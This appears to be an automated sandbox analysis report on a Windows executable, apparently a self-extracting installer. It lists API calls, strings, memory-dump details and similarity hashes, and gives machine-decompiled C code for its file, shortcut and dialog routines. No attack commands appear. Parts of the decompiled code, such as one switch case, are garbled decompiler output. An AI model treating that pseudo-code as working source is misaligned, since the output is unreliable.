0x001701bc
0x001701c4
0x001701cc
0x001701d4
0x001701dc
0x001701e4
0x001701ec
0x001701f4
0x001701fc
0x00170204
0x0017020c
0x00170214
0x0017021c
0x00170224
0x0017022c
0x00170234
0x0017023c
0x00170247
0x00170252
0x0017025d
0x00170268
0x00170273
0x0017027e
0x00170289
0x00170294
0x0017029f
0x001702aa
0x001702b5
0x001702c0
0x001702cb
0x001702d6
0x001702e1
0x001702ec
0x001702f7
0x00170302
0x0017030d
0x00170318
0x00170323
0x0017032e
0x00170339
0x00170344
0x0017034f
0x0017035a
0x00170365
0x00170370
0x0017037b
0x00170386
0x00170391
0x0017039c
0x001703a7
0x001703b2
0x00170484
0x0017048f
0x001704ac
0x001704b1
0x001704b3
0x001704b5
0x001704bf
0x001704cc
0x001704cc
0x001704c1
0x001704c5
0x001704c5
0x001704d0
0x001704f2
0x001704f2
0x00170503
0x00170510
0x00170518
0x00170522
0x00170526
0x00170528
0x00170560
0x00170560
0x00170562
0x00170679
0x00170679
0x00170570
0x0017057f
0x001705ee
0x001705f6
0x0017060a
0x0017060f
0x00170612
0x00170618
0x0017061a
0x00170623
0x00170638
0x00170650
0x0017065b
0x00170661
0x00170661
0x00170581
0x00170586
0x00170590
0x0017059c
0x001705a4
0x001705be
0x001705c3
0x001705dd
0x001705dd
0x00170669
0x00170669
0x0017052a
0x0017052c
0x0017052c
0x0017053d
0x0017054a
0x00170552
0x00000000
0x00000000
0x00170554
0x00170558
0x00000000
0x00000000
0x00000000
0x0017055a
0x0017055c
0x00000000
0x0017055c
0x001704d2
0x001704e7
0x001704ed
0x001704f0
0x00000000
0x00000000
0x00000000
0x001704f0
0x0017051a
0x0017051a
0x0017051b
0x00000000
0x00170520
0x001703be
0x001703c0
0x001703c3
0x00000000
0x00000000
0x001703d4
0x001703f6
0x001703fa
0x00170478
0x00170479
0x0017047f
0x00000000
0x0017040c
0x00170421
0x00170427
0x00170429
0x00000000
0x00000000
0x00170431
0x00170433
0x00170438
0x00170447
0x0017044f
0x0017046d
0x00170472
0x00170474
0x00170476
0x00000000
0x00000000
0x0017045a
0x0017045f
0x0017046b
0x0017046c
0x0017046c
0x00000000
0x0017046d
0x001703fa
0x001700f6
0x001700fc
0x00170103
0x00170107
0x0017010e
0x00170117
0x00170119
0x0017011f
0x0017011f
0x0017012d
0x00170131
0x00170148
0x0017014a
0x00170150
0x00170152
0x00170152
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 001700E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001700F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00170127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001703D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001703F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00170402
ReadFile.KERNEL32(00000000,?,00007FFE,00193BA4,00000000), ref: 00170421
CloseHandle.KERNEL32(00000000), ref: 00170479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0017048F
CompareStringW.KERNELBASE(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 001704E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00170510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0017054A

Part of subcall function 00170085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001700A0
Part of subcall function 00170085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0016EB86,Crypt32.dll,00000000,0016EC0A,?,?,0016EBEC,?,?,?), ref: 001700C2

_swprintf.LIBCMT ref: 001705BE
_swprintf.LIBCMT ref: 0017060A

Part of subcall function 0016400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0016401D

AllocConsole.KERNEL32 ref: 00170612
GetCurrentProcessId.KERNEL32 ref: 0017061C
AttachConsole.KERNEL32(00000000), ref: 00170623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00170649
WriteConsoleW.KERNEL32(00000000), ref: 00170650
Sleep.KERNEL32(00002710), ref: 0017065B
FreeConsole.KERNEL32 ref: 00170661
ExitProcess.KERNEL32 ref: 00170669

Strings

kernel32, xrefs: 001700DD
dwmapi.dll, xrefs: 00170194, 00170581
SetDllDirectoryW, xrefs: 001700F0
uxtheme.dll, xrefs: 0017058B
DXGIDebug.dll, xrefs: 00170169, 001704D3
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 001705F8
SetDefaultDllDirectories, xrefs: 00170121

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: 3055f7b403ff32752327528c3332d90caf658d66597f2b2617f9ee18ef718f80
Instruction ID: 1acfc33cd039ee12d0e4473d15d4a15947b9131f3f10e1d67bb7306c17448bb0
Opcode Fuzzy Hash: 3055f7b403ff32752327528c3332d90caf658d66597f2b2617f9ee18ef718f80
Instruction Fuzzy Hash: 06D160B1108384EBDB31DF50DD49B9FBAF8AB84704F54491DF6A9A6140DBB08A498B63

Uniqueness

Uniqueness Score: -1.00%

Function 0017BDF5, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0017BDF5(void* __edx) {
				intOrPtr _t226;
				void* _t231;
				intOrPtr _t287;
				void* _t300;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t311;

				_t300 = __edx;
				E0017E28C(E00192053, _t311);
				_t226 = 0x1bd4c;
				E0017E360();
				if( *((intOrPtr*)(_t311 + 0xc)) == 0) {
					L177:
					 *[fs:0x0] =  *((intOrPtr*)(_t311 - 0xc));
					return _t226;
				}
				_push(0x1000);
				_push(_t311 - 0x15);
				_push(_t311 - 0xd);
				_push(_t311 - 0x3508);
				_push(_t311 - 0xfd58);
				_push( *((intOrPtr*)(_t311 + 0xc)));
				_t226 = E0017AA36();
				 *((intOrPtr*)(_t311 + 0xc)) = 0x1bd4c;
				if(0x1bd4c != 0) {
					_t287 =  *((intOrPtr*)(_t311 + 0x10));
					do {
						_t231 = _t311 - 0x3508;
						_t306 = _t311 - 0x1bd58;
						_t302 = 6;
						goto L4;
						L6:
						while(E001717AC(_t311 - 0xfd58,  *((intOrPtr*)(0x19e618 + _t307 * 4))) != 0) {
							_t307 = _t307 + 1;
							if(_t307 < 0xe) {
								continue;
							} else {
								goto L175;
							}
						}
						if(_t307 > 0xd) {
							goto L175;
						}
						switch( *((intOrPtr*)(_t307 * 4 +  &M0017CAA1))) {
							case 0:
								__eflags = _t287 - 2;
								if(_t287 == 2) {
									E00179DA4(_t311 - 0x7d50, 0x800);
									E0016A49D(E0016B965(_t311 - 0x7d50, _t311 - 0x3508, _t311 - 0xdd58, 0x800), _t287, _t311 - 0x8d58, _t307);
									 *(_t311 - 4) = 0;
									E0016A5D7(_t311 - 0x8d58, _t311 - 0xdd58);
									E001670BF(_t311 - 0x5d50);
									while(1) {
										_push(0);
										_t295 = _t311 - 0x8d58;
										_t249 = E0016A52A(_t311 - 0x8d58, _t300, _t311 - 0x5d50);
										__eflags = _t249;
										if(_t249 == 0) {
											break;
										}
										SetFileAttributesW(_t311 - 0x5d50, 0);
										__eflags =  *(_t311 - 0x4d44);
										if(__eflags == 0) {
											L18:
											_t253 = GetFileAttributesW(_t311 - 0x5d50);
											__eflags = _t253 - 0xffffffff;
											if(_t253 == 0xffffffff) {
												continue;
											}
											_t255 = DeleteFileW(_t311 - 0x5d50);
											__eflags = _t255;
											if(_t255 != 0) {
												continue;
											} else {
												_t309 = 0;
												_push(0);
												goto L22;
												L22:
												E0016400A(_t311 - 0x1108, 0x800, L"%s.%d.tmp", _t311 - 0x5d50);
												_t313 = _t313 + 0x14;
												_t260 = GetFileAttributesW(_t311 - 0x1108);
												__eflags = _t260 - 0xffffffff;
												if(_t260 != 0xffffffff) {
													_t309 = _t309 + 1;
													__eflags = _t309;
													_push(_t309);
													goto L22;
												} else {
													_t263 = MoveFileW(_t311 - 0x5d50, _t311 - 0x1108);
													__eflags = _t263;
													if(_t263 != 0) {
														MoveFileExW(_t311 - 0x1108, 0, 4);
													}
													continue;
												}
											}
										}
										E0016B4F7(_t295, __eflags, _t311 - 0x7d50, _t311 - 0x1108, 0x800);
										E0016B207(__eflags, _t311 - 0x1108, 0x800);
										_t310 = E001835B3(_t311 - 0x7d50);
										__eflags = _t310 - 4;
										if(_t310 < 4) {
											L16:
											_t274 = E0016B925(_t311 - 0x3508);
											__eflags = _t274;
											if(_t274 != 0) {
												break;
											}
											L17:
											_t277 = E001835B3(_t311 - 0x5d50);
											__eflags = 0;
											 *((short*)(_t311 + _t277 * 2 - 0x5d4e)) = 0;
											E0017F350(0x800, _t311 - 0x40, 0, 0x1e);
											_t313 = _t313 + 0x10;
											 *((intOrPtr*)(_t311 - 0x3c)) = 3;
											_push(0x14);
											_pop(_t280);
											 *((short*)(_t311 - 0x30)) = _t280;
											 *((intOrPtr*)(_t311 - 0x38)) = _t311 - 0x5d50;
											_push(_t311 - 0x40);
											 *0x1c2074();
											goto L18;
										}
										_t285 = E001835B3(_t311 - 0x1108);
										__eflags = _t310 - _t285;
										if(_t310 > _t285) {
											goto L17;
										}
										goto L16;
									}
									 *(_t311 - 4) =  *(_t311 - 4) | 0xffffffff;
									E0016A4B3(_t311 - 0x8d58);
								}
								goto L175;
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax =  *0x1bdc84;
									__eflags =  *0x1bdc84;
									__ebx = __ebx & 0xffffff00 |  *0x1bdc84 == 0x00000000;
									__eflags = __bl;
									if(__bl == 0) {
										__eax =  *0x1bdc84;
										_pop(__ecx);
										_pop(__ecx);
									}
									__bh =  *((intOrPtr*)(__ebp - 0xd));
									__eflags = __bh;
									if(__eflags == 0) {
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										__esi = E0017AB9A(__ecx, __edx, __eflags);
										__eax =  *0x1bdc84;
									} else {
										__esi = __ebp - 0x3508;
									}
									__eflags = __bl;
									if(__bl == 0) {
										__edi = __eax;
									}
									__eax = E001835B3(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0x1bdc84);
									__eax = E001835DE(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0x1bdc84 = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E00187168(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L001835CE(__esi);
									}
								}
								goto L175;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
								}
								goto L175;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L175;
								}
								__eflags =  *0x1aa472 - __di;
								if( *0x1aa472 != __di) {
									goto L175;
								}
								__eax = 0;
								__edi = __ebp - 0x3508;
								_push(0x22);
								 *(__ebp - 0x1108) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x3508) - __ax;
								if( *(__ebp - 0x3508) == __ax) {
									__edi = __ebp - 0x3506;
								}
								__eax = E001835B3(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L175;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L52:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x1108 = E0016FE56(__ebp - 0x1108, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x1108;
											__eax = E001817CB(__ebp - 0x1108, __ebp - 0x1108);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *(__eax + 2) - __bx;
												if( *(__eax + 2) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x1108;
											__edi = 0x1aa472;
											E0016FE56(0x1aa472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
											__eax = E0017A8D0(__ebp - 0x1108, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
											__eax = SendMessageW(__esi, 0x143, __ebx, 0x1aa472); // executed
											__eax = __ebp - 0x1108;
											__eax = E001835E9(__ebp - 0x1108, 0x1aa472, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x1108 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1108);
											}
											goto L175;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x1c;
											__ebx = 0;
											_push(__ebp - 0x1c);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0x1c2028();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x1108;
												_push(__ebp - 0x1108);
												__eax = __ebp - 0x20;
												_push(__ebp - 0x20);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x1c));
												__eax =  *0x1c2024();
												_push( *(__ebp - 0x1c));
												 *0x1c2004() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x1108) = __cx;
											}
											__eflags =  *(__ebp - 0x1108) - __bx;
											if( *(__ebp - 0x1108) != __bx) {
												__eax = __ebp - 0x1108;
												__eax = E001835B3(__ebp - 0x1108);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x110a)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x1108 = E0016FE2E(__eflags, __ebp - 0x1108, "\\", __esi);
												}
											}
											__esi = E001835B3(__edi);
											__eax = __ebp - 0x1108;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x1108 = E0016FE2E(__eflags, __ebp - 0x1108, __edi, 0x800);
											}
											goto L65;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L52;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L175;
									}
									__ebp - 0x1108 = E0016FE56(__ebp - 0x1108, __edi, 0x800);
									goto L65;
								}
							case 4:
								__eflags =  *0x1aa46c - 1;
								__eflags = __eax - 0x1aa46c;
								 *__edi =  *__edi + __ecx;
								__eflags =  *__edi & __cl;
								_pop(es);
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x3508) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x3508) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L82:
									 *0x1a8453 = __cl;
									 *0x1a8460 = 1;
									goto L175;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0x1a8453 = __cl;
									L81:
									 *0x1a8460 = __cl;
									goto L175;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L82;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L175;
								}
								 *0x1a8453 = 1;
								goto L81;
							case 6:
								__edi = 0;
								 *0x1bec98 = 1;
								__edi = 1;
								__ebx = __ebp - 0x3508;
								__eflags =  *(__ebp - 0x3508) - 0x3c;
								if( *(__ebp - 0x3508) != 0x3c) {
									L99:
									__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
									if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
										L102:
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
										if( *((intOrPtr*)(__ebp + 0x10)) == 4) {
											__eflags = __esi - 6;
											if(__esi == 6) {
												__eax = 0;
												_push(0);
												_push(__edi);
												_push(__ebx);
												_push( *(__ebp + 8));
												__eax = E0017CE22(__ebp);
											}
										}
										goto L175;
									}
									__eflags = __esi - 9;
									if(__esi != 9) {
										goto L175;
									}
									_push(1);
									_push(__edi);
									_push(__ebx);
									_push( *(__ebp + 8));
									__eax = E0017CE22(__ebp);
									goto L102;
								}
								__eax = __ebp - 0x3506;
								_push(0x3e);
								_push(__ebp - 0x3506);
								__eax = E001815E8(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L99;
								}
								_t109 = __eax + 2; // 0x2
								__ecx = _t109;
								 *(__ebp - 0x14) = _t109;
								__ecx = 0;
								__eflags = 0;
								 *__eax = __cx;
								__eax = __ebp - 0x108;
								_push(0x64);
								_push(__ebp - 0x108);
								__eax = __ebp - 0x3506;
								_push(__ebp - 0x3506);
								while(1) {
									__ebx = E0017A6C7();
									__eflags = __ebx;
									if(__ebx == 0) {
										break;
									}
									__eflags =  *(__ebp - 0x108);
									if( *(__ebp - 0x108) == 0) {
										break;
									}
									__eax = __ebp - 0x108;
									__eax = E001717AC(__ebp - 0x108, L"HIDE");
									__eax =  ~__eax;
									asm("sbb eax, eax");
									__edi = __edi & __eax;
									__eax = __ebp - 0x108;
									__eax = E001717AC(__ebp - 0x108, L"MAX");
									__eflags = __eax;
									if(__eax == 0) {
										_push(3);
										_pop(__edi);
									}
									__eax = __ebp - 0x108;
									__eax = E001717AC(__ebp - 0x108, L"MIN");
									__eflags = __eax;
									if(__eax == 0) {
										_push(6);
										_pop(__edi);
									}
									_push(0x64);
									__eax = __ebp - 0x108;
									_push(__ebp - 0x108);
									_push(__ebx);
								}
								__ebx =  *(__ebp - 0x14);
								goto L99;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									L125:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0x1aa46c;
										if( *0x1aa46c == 0) {
											 *0x1aa46c = 2;
										}
										 *0x1a9468 = 1;
									}
									goto L175;
								}
								__eax = __ebp - 0x7d50;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
								E0016B207(__eflags, __ebp - 0x7d50, 0x800) = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0x19e5f8);
									__ebp - 0x7d50 = E0016400A(0x1a946a, __edi, L"%s%s%u", __ebp - 0x7d50);
									__eax = E0016A180(0x1a946a);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x1a946a);
								__eflags =  *(__ebp - 0x3508);
								if( *(__ebp - 0x3508) == 0) {
									goto L175;
								}
								__eflags =  *0x1b6b7a;
								if( *0x1b6b7a != 0) {
									goto L175;
								}
								__eax = 0;
								 *(__ebp - 0x1508) = __ax;
								__eax = __ebp - 0x3508;
								_push(0x2c);
								_push(__ebp - 0x3508);
								__eax = E001815E8(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L121:
									__eflags =  *(__ebp - 0x1508);
									if( *(__ebp - 0x1508) == 0) {
										__ebp - 0x1bd58 = __ebp - 0x3508;
										E0016FE56(__ebp - 0x3508, __ebp - 0x1bd58, 0x1000) = __ebp - 0x19d58;
										__ebp - 0x1508 = E0016FE56(__ebp - 0x1508, __ebp - 0x19d58, 0x200);
									}
									__ebp - 0x3508 = E0017A4F2(__ebp - 0x3508);
									__eax = 0;
									 *(__ebp - 0x2508) = __ax;
									__ebp - 0x1508 = __ebp - 0x3508;
									__eax = E00179F35( *(__ebp + 8), __ebp - 0x3508, __ebp - 0x1508, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L175;
									} else {
										__eax = 0;
										__eflags = 0;
										 *0x1a8450 = 1;
										 *0x1a946a = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
										goto L125;
									}
								}
								__edx = 0;
								__esi = 0;
								__eflags =  *(__ebp - 0x3508) - __dx;
								if( *(__ebp - 0x3508) == __dx) {
									goto L121;
								}
								__ecx = 0;
								__eax = __ebp - 0x3508;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__esi =  &(__esi->i);
									__eax = __ebp - 0x3508;
									__ecx = __esi + __esi;
									__eax = __ebp - 0x3508 + __ecx;
									__eflags =  *__eax - __dx;
									if( *__eax != __dx) {
										continue;
									}
									goto L121;
								}
								__ebp - 0x3506 = __ebp - 0x3506 + __ecx;
								__ebp - 0x1508 = E0016FE56(__ebp - 0x1508, __ebp - 0x3506 + __ecx, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x3508) = __ax;
								goto L121;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x3508) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x3508;
										_push(__ebp - 0x3508);
										__eax = E00187107(__ebx, __edi);
										_pop(__ecx);
										 *0x1bec94 = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0x1bec90 = E0017AB9A(__ecx, __edx, __eflags);
								}
								 *0x1b6b7b = 1;
								goto L175;
							case 9:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L175;
								}
								__eax = 0;
								 *(__ebp - 0x4d08) = __ax;
								__eax =  *(__ebp - 0x1bd58) & 0x0000ffff;
								__eax = E00186420( *(__ebp - 0x1bd58) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0x1bbb82);
									__eax = __ebp - 0x4d08;
									_push(__ebp - 0x4d08);
									__eax = E0016FE56();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x4d08;
									if(__eflags == 0) {
										_push(0x1bab82);
										_push(__eax);
										__eax = E0016FE56();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0x1bcb82);
										_push(__eax);
										__eax = E0016FE56();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9d58) = __ax;
								 *(__ebp - 0x3d08) = __ax;
								__ebp - 0x19d58 = __ebp - 0x6d50;
								__eax = E001857E6(__ebp - 0x6d50, __ebp - 0x19d58);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6d50) - __bx;
								if( *(__ebp - 0x6d50) != __bx) {
									__ebp - 0x6d50 = E0016A180(__ebp - 0x6d50);
									__eflags = __al;
									if(__al != 0) {
										goto L160;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6d50;
									__eflags =  *(__ebp - 0x6d50) - __bx;
									if( *(__ebp - 0x6d50) == __bx) {
										goto L160;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L148:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6d50 = E0016A180(__ebp - 0x6d50);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L156:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L157;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x3d08;
												L154:
												_push(__eax);
												__eax = E001857E6();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L156;
											}
											 *(__ebp - 0x3d08) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x3d06;
											goto L154;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L157;
										}
										goto L148;
										L157:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L160;
								} else {
									__ebp - 0x19d56 = __ebp - 0x6d50;
									E001857E6(__ebp - 0x6d50, __ebp - 0x19d56) = __ebp - 0x6d4e;
									_push(__ebx);
									_push(__ebp - 0x6d4e);
									__eax = E001815E8(__ecx);
									__esp = __esp + 0x10;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x3d08 = E001857E6(__ebp - 0x3d08, __ebp - 0x3d08);
										_pop(__ecx);
										_pop(__ecx);
									}
									L160:
									__eflags =  *((short*)(__ebp - 0x11d58));
									__ebx = 0x800;
									if( *((short*)(__ebp - 0x11d58)) != 0) {
										__ebp - 0x9d58 = __ebp - 0x11d58;
										__eax = E0016B239(__ebp - 0x11d58, __ebp - 0x9d58, 0x800);
									}
									__ebp - 0xbd58 = __ebp - 0x6d50;
									__eax = E0016B239(__ebp - 0x6d50, __ebp - 0xbd58, __ebx);
									__eflags =  *(__ebp - 0x4d08);
									if(__eflags == 0) {
										__ebp - 0x4d08 = E0017AB2E(__ecx, __ebp - 0x4d08,  *(__ebp - 0x14));
									}
									__ebp - 0x4d08 = E0016B207(__eflags, __ebp - 0x4d08, __ebx);
									__eflags =  *((short*)(__ebp - 0x17d58));
									if(__eflags != 0) {
										__ebp - 0x17d58 = __ebp - 0x4d08;
										E0016FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x17d58, __ebx) = __ebp - 0x4d08;
										__eax = E0016B207(__eflags, __ebp - 0x4d08, __ebx);
									}
									__ebp - 0x4d08 = __ebp - 0xcd58;
									__eax = E001857E6(__ebp - 0xcd58, __ebp - 0x4d08);
									__eflags =  *(__ebp - 0x13d58);
									__eax = __ebp - 0x13d58;
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										__eax = __ebp - 0x19d58;
									}
									__ebp - 0x4d08 = E0016FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x4d08, __ebx);
									__eax = __ebp - 0x4d08;
									__eflags = E0016B493(__ebp - 0x4d08);
									if(__eflags == 0) {
										L170:
										__ebp - 0x4d08 = E0016FE2E(__eflags, __ebp - 0x4d08, L".lnk", __ebx);
										goto L171;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L171:
											_push(1);
											__eax = __ebp - 0x4d08;
											_push(__ebp - 0x4d08);
											E0016A04F(__ecx, __ebp) = __ebp - 0xbd58;
											__ebp - 0xad58 = E001857E6(__ebp - 0xad58, __ebp - 0xbd58);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0xad58 = E0016BCCF(__eflags, __ebp - 0xad58);
											__ecx =  *(__ebp - 0x3d08) & 0x0000ffff;
											__eax = __ebp - 0x3d08;
											__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff);
											__edx = __ebp - 0x9d58;
											__esi = __ebp - 0xad58;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08;
											 *(__ebp - 0x9d58) & 0x0000ffff =  ~( *(__ebp - 0x9d58) & 0x0000ffff);
											asm("sbb eax, eax");
											__eax =  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58;
											 *(__ebp - 0xad58) & 0x0000ffff =  ~( *(__ebp - 0xad58) & 0x0000ffff);
											__eax = __ebp - 0x15d58;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi;
											E0017A5E4(__ebp - 0x15d58) = __ebp - 0x4d08;
